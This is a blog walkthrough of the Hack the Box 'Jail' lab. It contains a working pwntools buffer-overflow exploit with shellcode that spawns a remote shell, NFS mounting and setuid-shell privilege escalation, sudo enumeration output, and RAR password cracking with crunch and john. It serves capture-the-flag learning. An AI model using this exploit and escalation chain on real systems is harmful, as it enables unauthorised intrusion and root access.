Jail — Hack the Box Walk through

Observe pattern_create and the seg fault occurred because of the inserted characters.
Observe the password value is the value created using pattern_create
As we can see in the image that EIP is at offset 28, so EIP is 28 characters away from the actual password address.
#!/usr/bin/python
from pwn import *
import struct
shellcode = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
shellcode+="\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
shellcode+="\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
shellcode+="\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode+="\x89\xe3\x31\xc9\xcd\x80"
payload = "A"*28 + struct.pack("<I",0xffffd612 + 30) + shellcode
r = remote('10.10.10.34', 7411)
r.sendline('DEBUG')
print r.recv(1024)
r.sendline('USER admin')
print r.recv(1024)
r.sendline('PASS ' + payload)
r.interactive()
root@kali:~/Downloads# showmount -e 10.10.10.34
Export list for 10.10.10.34:
/opt *
/var/nfsshare *
root@kali:~# mount -t nfs 10.10.10.34:/var/nfsshare /tmp/nfsshare
root@kali:~# mount -t nfs 10.10.10.34:/opt /tmp/opt
root@kali:~#
root@kali:~/Documents# cat setuid.c 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main( int argc, char *argv[] )
{
setreuid(1000, 1000);
printf("Effective ID is: %d\n", geteuid());
printf("Real ID is: %d\n", getuid());
execve("/bin/sh", NULL, NULL);
}
[frank@localhost nfsshare]$ $ sudo -l
sudo -l
Matching Defaults entries for frank on this host:
!visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME
HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG
LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION
LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
_XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User frank may run the following commands on this host:
(frank) NOPASSWD: /opt/logreader/logreader.sh
(adm) NOPASSWD: /usr/bin/rvim /var/www/html/jailuser/dev/jail.c
[frank@localhost nfsshare]$ $
crunch 11 11 -o jail-wlist -f /usr/share/crunch/charset.lst symbols-all -t Morris1962@
rar2john keys.rar >jailhash
john --format=rar --wordlist=jail-wlist jailhash

--

--

--

I go by Padma. I am a security enthusiast. This blog contains security related and some general stuff. E-mail:pduggire@gmu.edu

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Internship Interview Experience at Goldman Sachs (Summer Analyst 2022)

A Journey to Profitable Python

Anything that can be automated will be automated in finance of GroupM Turkey

What are GitLab badges?

Beginners picking their first Game Engine

https://itnext.io/basics-of-3d-animation-in-unity-tutorial-d2d6ff3bc6b7

Why Use IT Managed Services?

Burn Dmg Image To Dvd

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
dl padmavathi

dl padmavathi

I go by Padma. I am a security enthusiast. This blog contains security related and some general stuff. E-mail:pduggire@gmu.edu

More from Medium

TryHackMe: Nmap Walkthrough

Nmap Logo at TryHackMe

HackTheBox Pandora Write-Up

Tryhackme Archangel Writeup

TryHackMe : Source write-up